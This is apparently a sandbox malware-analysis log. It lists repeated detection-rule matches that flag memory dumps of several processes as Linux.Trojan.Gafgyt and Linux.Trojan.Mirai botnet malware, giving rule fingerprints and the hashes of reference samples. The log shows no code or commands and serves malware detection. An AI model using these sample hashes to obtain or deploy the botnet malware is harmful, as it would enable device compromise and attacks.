Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6236.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
